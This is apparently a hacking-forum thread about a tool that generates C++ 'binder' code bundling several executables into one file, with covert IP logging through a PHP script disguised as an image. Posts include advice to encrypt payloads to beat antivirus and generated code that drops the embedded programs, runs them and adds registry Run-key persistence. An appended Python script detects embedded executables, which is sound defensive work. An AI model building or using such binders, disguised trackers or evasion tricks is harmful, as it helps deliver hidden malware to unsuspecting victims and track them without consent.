Full Version: Binder Code Generator
gman24
Short description:

Generates code, that when compiled acts like a bound file. Some extra options are there as well like PHP ip logging. The ip can be logged via a remote php file on a web server.

........................................................................................................................
Longer description:

Binder front end, cpp generator
To use, unzip the files into a directory and run the exe file. If all else fails read the instructions. If the instructions don't answer your question feel free to ask.
No integrated compiler yet.


This generates a cpp file called binddude.cpp in the directory of the program that is compilable right off the bat with dev c++ (unless you use php logging, then must include wininet.lib)

I'm sure since all you have to do is compile the file to create the bound file, you will find this useful. Bind up to 100 programs with the click of a button :).

.......................................

All the VB code is mine, some of the C code is mine the rest vnet576's. The php logging portion of the C code is mine. Edit: The php script itself however I got from a friend.

The credits for the original C bind code go to vnet576. You can view his original code, as well as the code to this program at the codelinx forum.

The regkey function in the generated code is a modified version of vnet576's function.
...............................................................

Notes:

You need to set the option to execute the bound file as well as the option to show the bound file running. When you run the frontend program all options are off by default.

The frontend program needs to have hex_dump.exe in the same directory (in zip file).


Read the readme for info on the php logging and option info.

If you use the php logging you need to include wininet.lib in a project (I'm working on bypassing this).


Large files may take a while; you can do them manually (look at vnet's tut) or start them, do something else for a while, and come back to it later.

There is a file size limit, not sure what it is yet, this can be increased by changing the code to allow more wait time for the bat files to finish.

Enjoy and please report any bugs.

It creates some files but it cleans up after itself.

Edit: update to 1.5
gman24
Thanks, I do have to mention though the PHP script itself isn't mine. It is a simple enough script to come up with, but I got it from my friend. The whole idea of using it to log IPs in a program and the C code in the program is mine however.
gman24
Update:

Updated it, now 1.5. Minor changes, just some tweaking; no more bugs found to fix yet. I take it no bugs have been found yet :).

Feel free to make any suggestions for changes to the layout, the interface, functions, etc.
tibbar
I've done a similar project. If you want to be more secure, then add in a simple algorithm to crypt the hexed programs. This will be guaranteed to beat AV in the long term.
gman24
[edit2]Ok, to make this clear this is a php script, but from the outside it functions exactly like an image. Therefore any link or viewing of it will treat it just like an image.

The reason for index.php is to prevent indexing

The log's name is "something"

This will log IPs just like the previous .php file included
[\edit2]

If you would rather it be an image (files attached) than a php file, copy the image you want to ima.jpg, upload everything, chmod "something" to 777 and change htaccess to .htaccess

Instead of the php file specify four.jpg in the program.

If you are on linux for your desktop and public_html is in your default directory on your shell (not is your default) you can use the scripts I made (in the tar file) to easily set it up. It will set it up in a directory called pie

change directory to where your files are extracted to

If you are using sftp (which I hope you are) these are the commands. You can use the same file with ftp by using the input command (like "ftp site < firstbat") but you need to add your password at the top.

If your account name on your box is the same as the destination you don't need to specify the user.

If this is your first time run
sftp -b firstbat (site)

to update run
sftp -b updatebat (site)

Edit:

If you don't have a shell but only sftp or ftp access or your default is in public_html then remove cd public_html from the bat and it will work in the current directory

for the update bat make cd public_html/pie into cd pie
Infected
when I try to compile it with Dev C++, it shows me some errors and doesn't let me compile

what can I do?
tibbar
post the errors and perhaps someone will be kind enough to help
Infected
CODE
#include <stdio.h>
#include <stdlib.h>
#include <process.h>
#include <windows.h>
void regkey(char thepath[],char filename[],char regname[]);










int main()
{
HANDLE file;
char sysdir[MAX_PATH];
char newfile1[MAX_PATH];
char newfile2[MAX_PATH];
DWORD written;


GetSystemDirectory(sysdir, MAX_PATH);
sprintf(newfile1, "C:\\1.exe");
sprintf(newfile2, "C:\\2.exe");

file = CreateFile(newfile1,GENERIC_WRITE,FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
WriteFile(file,hexdump1,len1,&written,0);
CloseHandle(file);
file = CreateFile(newfile2,GENERIC_WRITE,FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
WriteFile(file,hexdump2,len2,&written,0);
CloseHandle(file);



ShellExecute(0, "open",newfile1,NULL, NULL, SW_SHOW);
ShellExecute(0, "open",newfile2,NULL, NULL, SW_SHOW);
ExitProcess(0);
return 0;
}
void regkey(char thepath[],char filename[],char regname[])
{
  HKEY hKey;
   char szData[50];
   char szPath[MAX_PATH];
   char newfolder[MAX_PATH];
   sprintf(newfolder, "%s\\%s", thepath, filename);
   strcpy(szData, "\"" );
   strcat(szData, newfolder);
   strcat(szData, "\"");
   RegCreateKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, 0, KEY_ALL_ACCESS, NULL, &hKey, NULL);
   RegSetValueEx(hKey, regname, 0, REG_SZ, (LPBYTE)szData, sizeof(szData));
   RegCloseKey(hKey);
   }

QUOTE
C:\binderbinary1.5\binddude.cpp In function `int main()':
30 C:\binderbinary1.5\binddude.cpp `hexdump1' undeclared (first use this function)
  (Each undeclared identifier is reported only once for each function it appears in.)
30 C:\binderbinary1.5\binddude.cpp `len1' undeclared (first use this function)
33 C:\binderbinary1.5\binddude.cpp `hexdump2' undeclared (first use this function)
33 C:\binderbinary1.5\binddude.cpp `len2' undeclared (first use this function)


any idea what went wrong?
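
For triaging a file suspected of being a bound executable of the kind discussed in this thread, the following added example (not part of the thread or of the posted program) scans a file's bytes for additional PE headers, which is what arrays such as hexdump1 that get written out with WriteFile look like inside the compiled binary. It assumes the embedded programs are stored as raw, unencoded bytes; the function names, the header bounds and the sample data are constructed for illustration.

```python
import struct

MACHINES = {0x014C, 0x8664}  # IMAGE_FILE_MACHINE_I386, IMAGE_FILE_MACHINE_AMD64

def looks_like_pe(data: bytes, off: int) -> bool:
    """True if data[off:] starts with a plausible DOS + PE/COFF header."""
    if off + 0x40 > len(data):                  # DOS header is 64 bytes
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, off + 0x3C)
    if not 0x40 <= e_lfanew <= 0x1000:          # heuristic bound (assumption)
        return False
    sig = off + e_lfanew
    if sig + 8 > len(data) or data[sig:sig + 4] != b"PE\0\0":
        return False
    machine, nsections = struct.unpack_from("<HH", data, sig + 4)
    return machine in MACHINES and 1 <= nsections <= 96

def find_embedded_pe(data: bytes, skip_host: bool = True) -> list:
    """Offsets of PE images inside data; offset 0 is the host file itself."""
    hits, pos = [], data.find(b"MZ")
    while pos != -1:
        if looks_like_pe(data, pos) and not (skip_host and pos == 0):
            hits.append(pos)
        pos = data.find(b"MZ", pos + 1)
    return hits

def make_stub_pe(machine: int = 0x014C, size: int = 0x200) -> bytes:
    """Constructed header-only stand-in for an executable (not runnable)."""
    buf = bytearray(size)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)     # e_lfanew
    buf[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<HH", buf, 0x84, machine, 3)
    return bytes(buf)

def build_sample() -> bytes:
    """Constructed layout: host image, payload, stray 'MZ' text, payload."""
    decoy = b"MZ is not always a header" + b"\0" * 0x60
    return make_stub_pe() + make_stub_pe() + decoy + make_stub_pe(0x8664)

if __name__ == "__main__":
    for off in find_embedded_pe(build_sample()):
        print(f"embedded PE header at offset {off:#x}")
```

Legitimate installers and self-extractors also carry embedded executables, so a hit is a reason to look closer at the file, not a verdict.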